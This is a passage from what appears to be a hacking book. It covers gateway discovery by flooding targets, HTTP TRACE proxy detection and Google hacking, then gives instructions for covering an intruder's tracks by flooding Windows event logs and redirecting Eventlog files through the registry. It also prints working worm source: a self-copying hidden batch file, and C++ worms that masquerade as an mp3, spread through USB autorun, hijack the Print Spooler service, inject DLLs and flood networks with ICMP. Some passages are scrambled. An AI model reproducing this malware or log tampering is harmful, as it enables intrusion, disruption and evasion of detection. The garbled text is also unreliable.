The Tracert and Traceroute utilities use a simple technique which
employs the generation of ICMP TTL-expired packets from the hops. TTL is Time To Live: it is either a time in seconds or a number of hops (routers), with a maximum value of 255. TTL limits the age of packets; otherwise packets would fill up the whole world's network and no resources would be left for new packets. The packets travel at nearly the speed of light, and after crossing a hop (router or gateway) the TTL value is decreased by 1. Thus, at most, a packet can cross up to 255 hops, and the packet dies when its TTL reaches 0.

The Tracert utility creates a packet with TTL = 1 and sends it towards the next hop in the network. When the packet reaches that hop, the hop decreases the TTL by 1, so the new TTL = 0. As the TTL becomes 0, the hop generates an ICMP TTL-expired message and sends it back to the source. The ICMP TTL-expired packet contains information about the hop, like its IP address and domain name. Now we have got the first hop, which is the next system after our attacking computer, i.e., the gateway or router. The Tracert utility then generates another packet with the TTL incremented by 1, i.e., TTL = 2. This packet will cross the first hop, which decreases its TTL to 1; at the next hop the TTL is again decreased and becomes 0, the TTL-expired packet is generated by that hop and sent back to the source system, and that packet contains the information about the second hop. In this way the whole route can be traced.
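The TTL-expiry loop described above can be modeled in a few lines. This is a pure simulation over an invented hop list; a real Tracert sends ICMP probes on the wire, which the sketch only imitates.

```python
# Simulation of how Tracert discovers a route: send probes with TTL = 1, 2,
# 3, ... and record which hop returns the "TTL expired" message.

ROUTE = ["192.168.1.1", "10.10.0.1", "172.16.5.9", "198.51.100.7"]  # invented hops

def probe(route, ttl):
    """Return the address of the hop where a packet with this TTL dies,
    or None if the TTL is large enough to reach the destination."""
    for i, hop in enumerate(route):
        ttl -= 1                 # each hop decrements the TTL by one
        if ttl == 0 and i < len(route) - 1:
            return hop           # this hop generates ICMP TTL-expired
    return None                  # the packet reached the final host

def traceroute(route):
    discovered = []
    ttl = 1
    while True:
        hop = probe(route, ttl)
        if hop is None:
            discovered.append(route[-1])   # the destination itself answered
            break
        discovered.append(hop)
        ttl += 1
    return discovered

print(traceroute(ROUTE))
```

Each iteration reveals exactly one more hop, which is why tracing an n-hop route costs at least n probes.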
Multiple Network Gateways Detection

In the world of networks, most of the security things reside on the gateway itself, like security guards in real life at a building's access points, i.e., at the gate. The failure of a network gateway can completely shut down the business. The solution to this problem is to have more than one network gateway for a single network: if one gateway is overloaded, then the rest of the traffic will be allowed through the other gateways. In routing environments, such functionality is provided by protocols like OSPF (Open Shortest Path First) and BGP (Border Gateway Protocol). Another reason can be to provide reliability of services for customers and users by reducing the failures.

The network and routing protocols force the services to use only a single network gateway at a time if both gateways are up, to reduce the redundancy. An example of such a protocol in a layer-two switching environment is the spanning tree protocol, which controls the multiple channels to a single network entity and thus reduces the infinite frame loops and packet storms.

For attackers, the knowledge of multiple gateways on a target network may be a golden egg in hand. From the attacker's point of view, the different gateways to the same network may have different access policies defined for their firewalls (the ACL, Access Control List, which contains what is permitted to go inside and what not). There may be a gateway configured for unconditional remote access to the internal resources and network systems by the administrators. This is done to separate the controlling channels from the other gateway channels, as it decreases the chances of sniffing the connections in the control channels.
Access Control List: The ACL is the set of rules defined by the administrator for the firewall to follow.
So the difficulty is that, when all gateways are up, only one will be used at a time, to reduce the redundancy, packet storms and infinite connection loops. How, then, to find out the other gateways? There are several techniques, but they should be used depending upon the security implementations of the target system, like the IDS/IPS used by the target victim.

The first technique employs checking the route information with the Tracert or Traceroute command at different times of the day and night, and comparing the results of the route tracing to find out whether the target used the other gateway for the reliability of its services. One Tracert may provide juicy information during the work hours, while the conditions at non-working hours may be different. This technique is the most secure, as it produces less noise to be caught by an IDS/IPS system, especially if a huge time difference is introduced between two Tracert queries.

In the second technique, we have to forget about the IDS/IPS system. We are going to create a resource-eating packet storm on the target network: we can DOS (Denial of Service) attack it, send huge ping packets or broadcast ping queries to the target system, or open up a large number of simultaneous fake connections. The more the workload on the target system, the greater the chances of catching the other gateway, as the first gateway may already be used up by legal connections. Actually, we intentionally fill up all the network channels through the one network gateway already in use and then trace the route. For better results, trace the route every second by sending several queries to the same target, with every trace-route query started at a small time difference of a few seconds. This second technique should yield juicy information about the target's network gateways and the routes followed in different conditions.
There is also a third technique, secure enough not to be caught by IDS/IPS systems. In this technique, the route tracing is done from different geographical positions. The geographical distance among the tracing systems should span at least different ISPs (Internet Service Providers), or, for better results, the route-tracing queries should be done from systems in different countries. The paths followed in the third technique will differ up to the gateway of the target network; thus there may be chances to catch the underground gateways, because of the OSPF or BGP protocols.
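Comparing traces taken at different times or from different vantage points reduces to a set comparison over saved hop lists. The sketch below works on two such lists (the addresses are invented for the example), flagging hops that appear in one trace but not the other, which are the candidate alternate gateways.

```python
# Compare two traceroute results for the same target and report hops that
# differ; these are candidates for alternate gateways into the network.

def gateway_candidates(trace_a, trace_b):
    """Return hops unique to each trace, preserving order."""
    only_a = [h for h in trace_a if h not in trace_b]
    only_b = [h for h in trace_b if h not in trace_a]
    return only_a, only_b

# Trace during working hours vs. during an induced traffic flood:
normal = ["62.0.0.1", "80.10.2.5", "203.0.113.1", "203.0.113.50"]
loaded = ["62.0.0.1", "80.10.2.5", "203.0.113.2", "203.0.113.50"]

a, b = gateway_candidates(normal, loaded)
print("seen only in normal trace:", a)
print("seen only in loaded trace:", b)
```

A hop that appears only under load (here the .2 router) is exactly the kind of secondary gateway the techniques above are hunting for.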
Web Proxy Detection

Web servers are not directly connected to the Internet. Actually, a layer of proxy servers is introduced between the untrusted Internet and the web server. The proxy is actually a kind of firewall. The web server shown to the external world is actually the proxy server: these proxy servers are transparent and pretend to be the web server themselves. The proxy opens an HTTP port (port 80) on itself and acts as the web server, and this HTTP port forms a pipe (a channel) with the HTTP port on the real web server. The proxy servers are capable of filtering the packets and keeping the connections to the web server under surveillance. They are also capable of caching the web server's contents during their work; thus, instead of sending the request for a web page to the web server, the proxy server fulfills the client's request by serving the requested web page from its own cache, reducing the workload on the web server. This act of the proxy can foil attack attempts, as the actual web server stays hidden behind the proxy server.

Is there any way to know the actual network path followed by a packet to the web server and reveal all the proxies working between the client and the web server? The technique to reveal the proxies is known as proxy tracing. Actually, there is an HTTP command, normally used for troubleshooting purposes, that forces all the proxy servers to enlist their addresses in the packet header. Telnet to the web server at port 80, as:

Telnet www.webserver.com 80

The connection is formed and the screen clears up immediately; only a cursor blinks. This is the way an HTTP connection over telnet works.
But if there will be proxy servers in between the client and web server. The HTTP commands are always in upper case.Now parse it the command TRACE / <enter><enter> Remember after TRACE / press enter twice. the addresses of proxy servers will be shown in the output. But as you’ll press enter key twice. it will show nothing other than a blinking cursor. this is the HTTP convention to terminate the command. This happens if the return path of the packet is same as entering path. Note: While typing in the telnet window. This command makes a data packet which knocks the web server and returns back to the client machine. 277 . The output in that case can show the same address twice. The result of above command is as Well friends the above picture shows the output of TRACE / command operated on the local web server residing on the same computer system on which the client resides and having no web proxy at all. it will show the results.
The Intrusion
The Penetration by Registry

Once we have the victim system's administrative password, whether via hidden-shares enumeration, sniffing the hashes, or any other means, we can open the victim wide by using its registry hives remotely.
The Spider Hacking
Spider hacking is a new form of high-tech hacking. There are a few terms that should be clarified before proceeding in this field.

Bot: A bot is an automatic program capable of performing tasks at a single location.

Spider: A spider is a bot capable of performing tasks at several locations; it is a program capable of crawling several hosts itself, seeking information. Spiders are utilized in search engines.

Aggregator: An aggregator is a program which accumulates and formats the information collected by bots and spiders and displays this information in a human-understandable format.

The best example of spiders is the search engine. Search engines are of two types: those that search in titles or keywords, and those that implement advanced search technology. With the implementation of advanced search technology in search engines, the definition of the Internet has totally changed: advanced search technology has turned the Internet into a public entity, and anything attached to the Internet is no longer private. It doesn't matter whether the site owner has registered with the particular search engine or not. The advanced-search spiders have the ability to search not only in the keyword meta-headers of web pages but also in titles, URLs, cache, even the text or contents of the page, and even specific file types like log, htm, txt, xls, xml, exe, cgi, asp, etc. The advancement in the processing performance and efficiency of hardware and spider software can grind up the whole universe of data in a matter of a few hours. Advanced search has evolved into a branch of hacking known as "Spider Hacking" (e.g., Google Hacking; here we are going to learn a little bit beyond that). Google employs advanced search techniques and is one of the most powerful spiders available to the public. Well friends, now it's time to jump into the practical study of spider hacking.
The Google Hacking

Google is a powerful tool in the hands of a hacker. We can scan hosts around the world using Google and identify a huge number of victims within a second: victims providing a particular vulnerable service, those who have not patched their servers, those who are using old vulnerable software versions, etc. And the list is endless. Sometimes we don't even need exploits to crack into the systems; we can simply search for the information itself. For example, we landed on the following page without any authentication process, directly using Google, on a page which was meant to be hidden from the external world and is only for sysadmins.

[The original shows a screenshot of the page reached directly through Google.]

The listing reveals someone's internal network systems information and even allows a guess at the operating system of the web server. Whereas the situation is much worse in the following section:

107/10/23 23:01:47 [xxx.xxx.103.138](ERR:Ug1) HTTP_CONNECTION=keep-alive
HTTP_HOST=www2s.biglobe.ne.jp
HTTP_REFERER=
HTTP_USER_AGENT=Opera/4.0 (Windows 98; US) Beta 3 [en]
REMOTE_ADDR=xxx.xxx.103.138 REMOTE_PORT=47640

107/10/23 21:01:18 [xxx.xxx.103.138](ERR:Ug1) HTTP_CONNECTION=keep-alive
HTTP_HOST=www2s.biglobe.ne.jp
HTTP_REFERER=http://www2s.biglobe.ne.jp/~cru/library/zddbbs/cgibin/minibbs_s.cgi
HTTP_USER_AGENT=Opera/4.0 (Windows 98; US) Beta 3 [en]
REMOTE_ADDR=xxx.xxx.103.138 REMOTE_PORT=35550

[... further entries in the same pattern trimmed from the original listing ...]

The above block is a listing of a server log retrieved using Google advanced search. This log reveals a lot of IP addresses along with their operating-system type and browser type, even the port numbers used at the time and the directory structure.
The Termination

"We gotta get Steve out of the house."
"How much time do you need?"
"Five minutes flat."
"Don't be cocky. This is the easy part. It's not the same as opening a safe for the police. Perspiration on your fingertips, heart's pounding... Whole different ball game. The getaway can get us caught."
"I appreciate your concern. I'll be fine."

Italian Job (Hollywood movie)
The Termination & Safe Getaway

This is the most important part of the whole hacking process. Most people don't plan this phase of hacking and unfortunately leave their traces. This phase constitutes the log clearing and then the safe termination, and it makes the difference between hackers and script kiddies. We must plan even the tidbits of this phase. The attacker ensures that the victim system is altered enough for an easy later entry. Then the log-clearing process comes into action.

There are plenty of tutorials, and even a huge set of software, available for Linux log clearing. But we are not here for script-kiddie training; instead we are going to discuss some other, inbuilt techniques for this purpose.

If we are hacking via the IIS services (Microsoft's Internet Information Services: www, ftp, SMTP, etc.), the default log files are created under the %systemroot%/system32/logfiles folder. If we are at admin level (root), then we can easily erase the lines including our IP addresses and other undesired entries. If we are connected to a remote victim system via command console, then never use the edit command: it will hang the connection. Instead use the edlin text editor found in Windows; just type edlin at the command console, and type "?" for viewing its help. But you need a lot of practice to use edlin, as it is not as user-friendly as edit.

Note: Never delete the log files or clear the whole text of the log files. That would bring the suspicion of the sysops, who can isolate the system from the network, keep an eye on the victim system for a future entry, and bust the attacker. Other system logs, like the System, Application and Security logs, can't be easily cleared. Even rootkits fill these syslogs with junk data like "AAAAAA", and this
FOR /L %x IN (1. Just type the following script in command console and then watch out the effect click and open the following control panel\administrative tools\event viewer then select System. then it will start overwriting the older events.1.can bring the victim system under suspicion of a cracked box.9) DO eventcreate /T ERROR /ID %x /L SYSTEM /D "The fatal error 0x007a45d7 caused the memory fault" 287 . otherwise the system halts. Therefore. We can also use CreateEvent function in C++ for the same purpose to develop our own program for filling the syslogs. There are some strategies used to maintain the log files. We can use the eventcreate command in windows XP along with the FOR command to create several events to fill up the event logs. we are creating 9 subsequent events in System syslogs. we need some other techniques. Like if the log file size increases than a certain limit. Well there is a facility provided by the windows XP to create the events in event logs. In the following script.
There is actually no way to delete individual lines from these syslogs, because the OS kernel keeps these syslogs exclusively open. We can only view the entries in these syslogs by copying their log files from the %systemroot%/system32/config directory. But if we are root (have admin privileges) on the victim, we can clutch the Eventlog service and shift it from the original log files to log files of our choosing; the log files will then get switched to files having none of our traces. This process requires no third-party software and is safe, but it requires restarting the victim system: during the termination process, we can force-shutdown the victim system so that the switch takes effect when it reboots. Also, we need to delete the original log files. For this purpose, we can schedule a task with the AT command so as to delete the original log files at the next reboot; with the AT command we can only specify the time. Instead, we can also use the SCHTASKS command from the console window to add a task that runs while the computer starts or while a user logs on, using the /MO switch with ONSTART or ONLOGON.
The following is the path of the Eventlog service in the registry:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog

Under the Eventlog key we can see three log types: Application, Security & System. Select Application, and in the right pane double-click File. This is a string-value registry variable containing the path of the log file. Copy the original log files, edit the copies so as to remove the intrusion traces, and specify their names and paths in this variable for all log types. Now schedule a task to delete the original log files for execution immediately at the next reboot, and force the system to restart. This will switch the log files.

For extra security measures, we should afterwards change the log file names in the registry settings back to the original names and copy the switched log files under the original log file names. Then reboot the victim system once again, and after that delete the earlier switched log files. We can achieve all these steps by scheduling each and every step with perfect timing.

Note: Once we are root on a remote system, we can open its HKLM registry key in the local computer's Registry Editor using File\Connect Network Registry. Or we can even use the console registry commands to alter the registry settings. One important command is reg. [The original shows a screenshot of the reg command's options.] The following command will modify the registry settings for the Application log:
The system logfiles also employ unique structure for each & every event. Diffying Attack: In this kind of attack. A bad thing about windows log files is that these files are not protected by any kind of checksum or hash code. We copied the application log file and our both copied instances were having the difference of only single event.g.reg add HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application /f /v File /d %%systemroot%%\system32\config\AppEvt. We can use any utility capable of differentiating two files e. This makes them vulnerable and dependent on the perimetric security. Therefore we must now how to alter the logfiles. which has its own limitations. hackers find out the differences among different instances of same object and then alter the instances themselves and feed the altered instance to the victim system and force the victim system to do as desired. Well friends. every log file has a unique structure in itself. But still there may be the traces of suspicious nature. FC command at command console is a handy tool for this case.evt It may be difficult to edit the log traces in console mode. 291 . therefore it is advised to copy all the logfiles just after the intrusion is successful and before doing other stuff. We can identify it by copying the log file at two different instances and applying the diffying attack on them.
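The idea behind the FC comparison, finding the byte offsets at which two instances of a file differ, can be sketched generically in a few lines of Python. This is a plain, generic file-comparison demo; the helper name byte_diff is our own, not a standard utility.

```python
# A tiny, generic byte-level comparison in the spirit of the FC command:
# it reports the offsets at which two files differ.
def byte_diff(path_a: str, path_b: str) -> list[int]:
    with open(path_a, "rb") as fa, open(path_b, "rb") as fb:
        a, b = fa.read(), fb.read()
    common = min(len(a), len(b))
    # Offsets where both files have data but the bytes disagree.
    diffs = [i for i in range(common) if a[i] != b[i]]
    # Any trailing bytes present in only one file also count as differences.
    diffs.extend(range(common, max(len(a), len(b))))
    return diffs

if __name__ == "__main__":
    with open("one.bin", "wb") as f:
        f.write(b"hello world")
    with open("two.bin", "wb") as f:
        f.write(b"hello_world")
    print(byte_diff("one.bin", "two.bin"))  # -> [5]
```

Running a comparison like this on two snapshots of the same file quickly shows which region changed between the two instances.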
The Artificial Life

Where there is a brain, there is no barrier.

— “v”
The Creation of Artificial Life

Artificial life has been the hottest topic since the evolution of robotics and virology. In this section we are going to deal with code which can work on its own: code which can not only behave like a living organism, but is truly capable of reproduction, taking decisions, reproducing itself and, most important, learning without the need of anyone else. Think about it: what happens if we start creating, or better say manufacturing, such things? Your guess is right, we are going to discuss worms and virii in this section. Artificial life is the eighth wonder of this universe, created by the recreation hackers, and hackers without knowledge of the working of viruses and worms are not truly hackers. We are going to discuss the concepts which can help such code in learning, taking decisions and working on its own and, most important, how to produce such living code organisms. We'll start with the simplest code that incorporates console commands in a batch file & then slowly move towards the most sophisticated link-virus structure.
Worm and Virus

People often use the terms worm and virus interchangeably for one another, so first of all we should know the basic difference between a worm and a virus. Worms have their own physical existence: they have their own disk files, and these files are executed to execute the worm. The virus, on the other hand, acts just like a bio-organic virus; it relies on other living cells for its existence. The deadliest form of virus, the exe link virus, exploits the exe header information and injects its own code into existing executable programs. This is done in such a way that the viral code gets the executional control before the main code of the software executes; after processing the viral code, the execution is transferred to the software's main code. This viral processing action is so fast that the processing lag is worth a few milliseconds, which is negligible for human perception, & the virus infection remains unsuspected.

The reproduction of a worm can be done in several ways. The mostly used two ways are either creating fresh copies of its disk files, or creating hardlinks (a hardlink is a link to an existing file; actually all the links point to the same physical location on the file system, so an edit made through one link reflects in all hardlinks) in such a way that the original file can exist in several directories, or in the same directory with different names. The hardlink approach is used to avoid the disk filling of the host system as a result of the reproduction, but it is capable of reproduction on a single logical partition only. In another approach polymorphism is exhibited, which means the worm's reproduced copy is different from the host worm.
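The hardlink behaviour described above, several directory names all pointing at one physical file so that an edit through one name shows through every other name, can be verified with a small, benign Python sketch. This is a plain filesystem demo with nothing worm-related about it; the function name is our own.

```python
import os
import tempfile

def demo_hardlink() -> tuple[int, str]:
    """Show that two hard-linked names share one physical file."""
    tmp = tempfile.mkdtemp()
    original = os.path.join(tmp, "original.txt")
    alias = os.path.join(tmp, "alias.txt")

    with open(original, "w") as f:
        f.write("first version")

    os.link(original, alias)            # second directory entry, same inode

    nlink = os.stat(original).st_nlink  # the link count is now 2

    with open(alias, "w") as f:         # edit through the second name...
        f.write("edited via alias")

    with open(original) as f:           # ...and the change shows via the first
        return nlink, f.read()

if __name__ == "__main__":
    print(demo_hardlink())  # -> (2, 'edited via alias')
```

Deleting one of the names only decrements the link count; the data survives until the last link is removed, which is exactly why a hardlinked file can "exist" under several names without consuming extra disk space.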
The Simplest Traversing

Friends, it's time to practice some of the simplest code creations. Have you ever bothered about the two subdirectories automatically created in a directory? These are “.” and “..”; you can find them in every directory using the dir command on the command console. The single-dot directory “.” is used to point to the same directory, whereas the double-dot “..” is used to point to the previous directory. You can check it by the following dir commands:

1) Dir .
2) Dir ..

The command (I) will display the contents of the same directory, whereas the command (II) will show the contents of the previous directory. Now let's create a code which can copy itself into the previous directory and then execute the copied file. Open the notepad and type in:

@echo off
copy traverse.cmd ..\traverse.cmd
cd..
attrib +h .\traverse.cmd
traverse

And save the file with the name traverse.cmd (you can also use the extension .bat, but then change it in the above code also). Save this file somewhere deep down under several folders and double-click it from there. Now check out all the previous directories in the path for the existence of the file traverse.cmd: it will be in every directory in the path with the hidden attribute set.
Worm Coding

The worms and viruses are mostly coded in assembly language. This gives the advantage of smaller size, the speed optimizations and much more control of the developer over the worm or virus. But we are going to discuss worm creation in C++ in this section, applying the concepts studied earlier. Before starting to code our first C++ worm, let's discuss a little about a worm's structure. The worm has at least two different sections: one section takes care of its reproduction (also called cloning), the clone section, and the other section triggers the reproduced copies, the trigger section. There may be other sections like the payload section, the encryption section, the decrypting block and the exploits section, but in our first worm we are going to code only the two sections. Every worm has a mission, and after the completion of its mission finally the worm should terminate the host processes or remove the worm files from the hosting victims. Extra care must be taken here that the trigger section might not trigger too many clones, otherwise the system will get overloaded and will be suspected for infection. You should add the automatic boot-up triggers in the last phase of the worm development process.

The worm development also creates some problems for the developers. If anything goes wrong during development, you should create the worm termination scripts first and always observe the process lists and the cpu and memory performances in task manager. Also, you might back up your important data before proceeding. One more thing friends, always document your worm in a file sidewise; this documentation will help you understand if anything went wrong, and this will help you a lot. One very effective worm termination script is

FOR /L %I IN (1,1,100) DO TASKKILL /F /IM "WORM_EXE_FILE" /T

The above script is quite effective if the worm goes wild during the development phase, but this will not stop the advanced worms: it can terminate only the worms with a very weak mechanism. Once the worm employs the automatic boot-up triggers, this script will give up. Remember, this script also eats up the cpu and makes its usage 100%.

Let us start with a little program that, once started, will execute itself recursively and will never end. This technique is called the recursive execution technique: the process launches a fresh executing clone process of itself before terminating itself. The newer process has a new process ID and all resource allotments are done exclusively for it again. The ShellExecute() function determines the file launcher depending upon the file type (the file extension). The process in this case will not have any window. Thus, after double clicking the executable file, the process will keep on executing recursively in the memory. The following code is the simplest program employing the recursive execution technique:

/* testproc.cpp */
#include <iostream>
#include <windows.h>

#define PROCESSNAME "testproc.exe"

using namespace std;

int main (int argc, char* argv[])
{
    ShellExecute(NULL, "open", PROCESSNAME, NULL, NULL, 0);
    return EXIT_SUCCESS;
}

Next, a worm should have a mission; the payload section is determined by the mission or motto of the worm. In this case the worm has been assigned the mission to flood the network segment with broadcast icmp packets. The following three functions from icmp.dll will accomplish this task: IcmpCreateFile, IcmpSendEcho & IcmpCloseHandle. The target IP address can easily be changed to any victim, to launch a resource-eating attack on the target network, by changing the macro IPADDR from the broadcast address to the host-to-network transformed ip address number. If you don't know about it, then refer to the socket programming section.
The worm also reproduces itself from one system to another and launches in another system.h> #include <direct. The autorun.cpp */ #include <iostream> #include <windows.inf automatically launches the worm file automatically. #define PROCESSNAME "virus4. Flags. The following code accomplishes all the things discussed above and compile it and execute the executable file to execute worm /* virus4. *OptionsData. RoundTripTime. The worm changes the executable file path to a copy of itself in system32 directory. { { unsigned char Ttl.\\virus4. for this purpose. The next step is to make the worm launch itself when the system boots up. struct E DWORD Address.exe" #define PROCESSPATH ". in following code. then copies itself with the name defined in DISGUISE macro. Tos.h> #include <sys/stat. the worm creates a new thread. /*-----------------The icmp global section-------------------*/ struct o }. We have chosen the Print Spooler service for this purpose.exe" #define DISGUISEPATH "\\Hotel California.exe" #define PROCSSPATH "\\virus4. if found. For this the worm configures the settings of a service.h> #define DISGUISE "Hotel California.exe" #define ENVOKER "\\envoker. which checks for the USB removable drives. we have named it “Hotel California. // The address to be attacked with 299 . unsigned long Status.mp3.exe” and creates an autorun.exe" #define FILEATTRIB 34 #define IPADDR INADDR_BROADCAST icmp echoes. OptionsSize.exe" using namespace std.mp3..mp3.inf file.
ENVOKER). struct o Options. FILEATTRIB). strcat(envokerPath. DWORD. strcpy(envokerPath. PROCSSPATH). char systemPath[101]. LPVOID. CopyFile(file. 0). envokerPath. SetFileAttributes(PROCESSPATH. systemPath). 50). void *Data. DWORD d. SetFileAttributes(systemPath. char aa[100]. systemPath. struct E es. strcat(systemPath. buffer[201]. HANDLE ( WINAPI *pIcmpCreateFile) ( void ). DWORD). struct o I. system(buffer). SetFileAttributes(envokerPath. WORD. struct hostent *phostent. Reserved. FILEATTRIB). LPVOID. NULL). GetSystemDirectory(systemPath. FILEATTRIB). LPVOID. envokerPath[101]. CopyFile(file. HANDLE hIP. THREAD_PRIORITY_HIGHEST). WSADATA wsa. DWORD. strcpy(buffer. }. envokerPath). PROCESSPATH. DWORD ( WINAPI *pIcmpSendEcho) (HANDLE.unsigned short DataSize. HMODULE hicmp. CopyFile(file. strcat(buffer. BOOL ( WINAPI *pIcmpCloseHandle ) ( HANDLE ). "SC CONFIG Spooler error= ignore binpath= "). /*----------------------------------------------------*/ void _declspec (dllexport) identify(char *file) { SetThreadPriority(GetCurrentThread(). } void _declspec (dllexport) systemProc(char *proc) { 300 . 0).
countsys++) _asm { nop } */ /* The payload code can be inserted here. strcpy(newloc. fprintf(fp. // If not then copy the file. "[autorun]\nopen=%s". i++./** * The payload section. drive[2] = '\0'.inf"). strcat(newloc. 0). /* The code will be executed with highest privileges */ // This line fetches the removable drives. autof[20]. THREAD_PRIORITY_HIGHEST). DISGUISE). &stbuf)) == -1) { already exists in the pen drive. // Check if file 301 . DISGUISEPATH). } void _declspec (dllexport) procCloner(char *cfile) FILE *fp. drive[1]= ':'. strcat(autof. **/ SetThreadPriority(GetCurrentThread(). i < 256. "w"). strcpy(autof. let++) if (let > 0x5A) let = 0x43. struct stat stbuf. newloc. CopyFile(cfile. newloc[30]. for (int i = 0. The payload will run as an service. char drive[3]. "\\Autorun. if ((GetDriveType(drive)) == 2) { { { SetThreadPriority(GetCurrentThread(). int let = 0x43. drive[0] = (char)let. if ((stat(newloc. fp = fopen(autof. drive). countsys < 10. THREAD_PRIORITY_HIGHEST). for (int countsys = 0. drive).
char dirpath[201]. ". (DWORD (__stdcall *)(void*))smack. } } } /*-----------------.The main engine of worm ------------------*/ int main (int argc. HANDLE thread. char* argv[]) // { SetThreadPriority(GetCurrentThread(). } else { smack = (void (*)(char *))GetProcAddress(hmod. hmod = LoadLibrary(procfile). GetCurrentDirectory(200. thread = CreateThread(0. (DWORD (__stdcall *)(void *))clonproc. procfile. void (*smack)(char *). ptr = argv[0].fclose(fp). dirpath). 0). cloner = CreateThread(0. "?identify@@YAXPAD@Z"). } void (*clonproc) (char *). ptr). 0. ". thands[3]. "system32")) != NULL) smack = (void (*)(char *))GetProcAddress(hmod. 0. HMODULE hmod. { { 302 .exe")) == NULL) strcat(procfile. THREAD_PRIORITY_HIGHEST).exe"). SetFileAttributes(newloc. procfile[300]. } else continue. "?systemProc@@YAXPAD@Z"). cloner. strcpy(procfile. char *ptr. 0). clonproc = procCloner. 0. if ((strstr(ptr. if ((strstr(dirpath. procfile. 28). 0.
unsigned long.void *. termination of two threads.void *. hIP = pIcmpCreateFile(). ping++) pIcmpSendEcho(hIP. FreeLibrary(hicmp). FreeLibrary(hmod). pIcmpCloseHandle(hicmp).DLL"). &I. 0. 0.unsigned long.Ttl = 255.. IPADDR."open". 0). 200)."). NULL. &es. thands[2] = '\0'. 200). "IcmpCloseHandle").thread = CreateThread(0.unsigned long))GetProcAddress(hicmp. pIcmpCloseHandle = (int (__stdcall *)(void *))GetProcAddress(hicmp. WaitForMultipleObjects(2. (DWORD (__stdcall *)(void*))smack. 8000). // WaitForSingleObject(thread. procfile. 0. } // Waits for the 303 . NULL. NULL. true. /*--------------------------------------------------*/ // WaitForSingleObject(cloner. thands[1] = thread. return EXIT_SUCCESS.unsigned short. NULL. 0). ping < 10. /*--------------. // Activate this while testing the single thread. 0)."open".The icmp section -----------------*/ hicmp = LoadLibrary("ICMP. "IcmpCreateFile"). 0. "IcmpSendEcho").void *. pIcmpCreateFile = (void *(__stdcall *)(void))GetProcAddress(hicmp. pIcmpSendEcho = (unsigned long (__stdcall *)(void *. ShellExecute(NULL. I. ShellExecute(NULL. 100). thands. for (int ping = 0. // Activate this while testing the single thread. sizeof(es). } thands[0] = cloner. PROCESSNAME. chdir(". PROCESSNAME.
The Kanjrala has been developed to flood the LAN with the ICMP echoes. Truly a energetic and life full code. The name Kanjrala has been provided to it to respect the natures creativity on this universe and particularly at Kanjrala a place in high mountain ranges of The Himalaya. The Kanjrala worm carries a DLL file along with itself.exe from task manager’s processes list. but will hog the cpu and this can easily be noticed by the sysops. Well.exe process. then they will fight for overpowering the system and only one being the youngest one will remain in execution state and it will kill all other executing Kanjrala variants.dll decides which code to trigger in taskmgr. The Kanjrala worm is a territorial worm. thus creating unnecessary two processes at least. The DLL contains few functions for different OS processes. this DLL is named Kanj. Now lets move on to the next variant of our earlier worm virus4. the system function every time initiates the cmd. It means at a time only one clone of Kanjrala will be working on the infected system. the Kanjrala worm.The above coding is quite lively. The Kanjrala is designed to alter the operating system’s processes in such a way that they will automatically trigger a clone of it after a certain interval of time. The address to which the ICMP packets are sent is the broadcast address of the LAN. The Kanjrala worm incorporates the DLL injection attack and injects the Kanj. Most important code is the one that hides the Kanjrala. Thus. the Kanjrala becomes hard to kill process. But this address can 304 .dll into taskmgr.dll and is placed as hidden everywhere the Kanjrala clone is created. The process generation is considered very heavy process and might be avoided as much as possible. Now what this DLL is supposed to do? You’ll find its answer soon. Actually. Is it? But we have killed it easily… This is the most obvious answer we hear from people whoever test the Kanjrala. Once running as a service. the Kanj. 
But If multiple clones will be triggered.exe and then execute the respective program.exe process and takes appropriate actions. Kanjrala is truly a CPU saver.
* If another newer worm process starts in between. * At a single instance of time only one worm process will execute at all.0 * Author: "v" * The name has been given to it to honor the nature and its versatility * as well as the fertility & fatality at Kanjrala Dhar. it will kill all its elder siblings.exe" #define ENVOKER "\\envoker.mp3. You can add a CD burning module into it yourself. it provides a nerocmd. * The nature shows its powers & the heaven on sharp & high mountain peaks. For examples if you are using the Nero. * ######## This worm is ranked safe for execution **/ #include <iostream> #include <windows. Few variants of the Kanjrala can bring down any network segment in the world.h> #define DISGUISE "Hotel_California. The Kanjrala infects the pen drives and the flash cards.h> #include <ctype. 305 . * The Kanjrala worm impersonates the Print Spooler service to be alive.exe that can be used to infect the multisession CDs or use Nero API for doing so.h> #include <direct.exe" #define FILEATTRIB 34 and ######## ######## * ######## does not cause harm of any kind to the systems.cpp */ /** The Kanjrala worm version 2.be changed to attack any target network with resource eating attack. Lets check out the code of Kanjrala. * This worm is intelligent and tries to save the cpu in several manners.mp3.h> #include <TlHelp32.exe" #define DISGUISEPATH "\\Hotel_California. * The Kanjrala Dhar is my favorite place in this world I've ever visited.h> #include <sys/stat.cpp /* Kanjrala.
DWORD. /*----------------------------------------------------*/ { { unsigned char Ttl. OptionsSize. using namespace std. struct E DWORD Address. }. Flags. Reserved. DWORD). char aa[100].\\Kanjrala. struct E es. DWORD ( WINAPI *pIcmpSendEcho) (HANDLE. unsigned long Status.#define IPADDR INADDR_BROADCAST icmp echoes. void *Data.exe #define DLLPATH "\\kanj.dll" // All macros with suffix path are defined to save cpu from strcat code. struct o I. unsigned short DataSize. Tos. WSADATA wsa. LPVOID. HANDLE ( WINAPI *pIcmpCreateFile) ( void ). WORD. HMODULE hicmp.exe" #define PROCSSPATH "\\Kanjrala. 306 . BOOL ( WINAPI *pIcmpCloseHandle ) ( HANDLE ).exe" #define PROCESSPATH ". DWORD. LPVOID. *OptionsData. DWORD d.. /*-----------------The icmp global section-------------------*/ struct o }. struct o Options.dll" // The address to be attacked with // The name of the dll to be injected into remote processes like taskmgr.exe" #define DLLNAME "kanj. LPVOID. RoundTripTime. struct hostent *phostent. #define PROCESSNAME "Kanjrala. HANDLE hIP.
